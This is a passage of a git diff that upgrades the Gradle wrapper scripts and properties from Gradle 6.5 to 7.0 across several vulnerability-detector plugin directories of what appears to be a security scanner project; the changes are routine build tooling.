to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/spring/gradlew.bat b/google/detectors/exposedui/spring/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/spring/gradlew.bat +++ b/google/detectors/exposedui/spring/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/wordpress/gradlew b/google/detectors/exposedui/wordpress/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/wordpress/gradlew +++ b/google/detectors/exposedui/wordpress/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/wordpress/gradlew.bat b/google/detectors/exposedui/wordpress/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/wordpress/gradlew.bat +++ b/google/detectors/exposedui/wordpress/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar index afba10928..d64cd4917 100644 Binary files a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties index e5d4f45e4..d04736436 100644 --- a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/ai/cve202348022/gradlew b/google/detectors/rce/ai/cve202348022/gradlew index 65dcd68d6..1aa94a426 100755 --- a/google/detectors/rce/ai/cve202348022/gradlew +++ b/google/detectors/rce/ai/cve202348022/gradlew @@ -83,10 +83,8 @@ done # This is normally unused # shellcheck disable=SC2034 APP_BASE_NAME=${0##*/} -APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. MAX_FD=maximum @@ -133,10 +131,13 @@ location of your Java installation." fi else JAVACMD=java - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. @@ -144,7 +145,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then case $MAX_FD in #( max*) # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 MAX_FD=$( ulimit -H -n ) || warn "Could not query maximum file descriptor limit" esac @@ -152,7 +153,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then '' | soft) :;; #( *) # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 ulimit -n "$MAX_FD" || warn "Could not set maximum file descriptor limit to $MAX_FD" esac @@ -197,11 +198,15 @@ if "$cygwin" || "$msys" ; then done fi -# Collect all arguments for the java command; -# * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of -# shell script including quotes and variable substitutions, so put them in -# double quotes to make sure that they get re-expanded; and -# * put everything else in single quotes, so that it's not re-expanded. + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. set -- \ "-Dorg.gradle.appname=$APP_BASE_NAME" \ diff --git a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar index afba10928..d64cd4917 100644 Binary files a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties index e5d4f45e4..d04736436 100644 --- a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/ai/cve20236018/gradlew b/google/detectors/rce/ai/cve20236018/gradlew index 65dcd68d6..1aa94a426 100755 --- a/google/detectors/rce/ai/cve20236018/gradlew +++ b/google/detectors/rce/ai/cve20236018/gradlew @@ -83,10 +83,8 @@ done # This is normally unused # shellcheck disable=SC2034 APP_BASE_NAME=${0##*/} -APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. MAX_FD=maximum @@ -133,10 +131,13 @@ location of your Java installation." fi else JAVACMD=java - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. @@ -144,7 +145,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then case $MAX_FD in #( max*) # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 MAX_FD=$( ulimit -H -n ) || warn "Could not query maximum file descriptor limit" esac @@ -152,7 +153,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then '' | soft) :;; #( *) # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 ulimit -n "$MAX_FD" || warn "Could not set maximum file descriptor limit to $MAX_FD" esac @@ -197,11 +198,15 @@ if "$cygwin" || "$msys" ; then done fi -# Collect all arguments for the java command; -# * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of -# shell script including quotes and variable substitutions, so put them in -# double quotes to make sure that they get re-expanded; and -# * put everything else in single quotes, so that it's not re-expanded. + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. set -- \ "-Dorg.gradle.appname=$APP_BASE_NAME" \ diff --git a/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/confluence/cve202226134/gradlew b/google/detectors/rce/confluence/cve202226134/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/confluence/cve202226134/gradlew +++ b/google/detectors/rce/confluence/cve202226134/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# 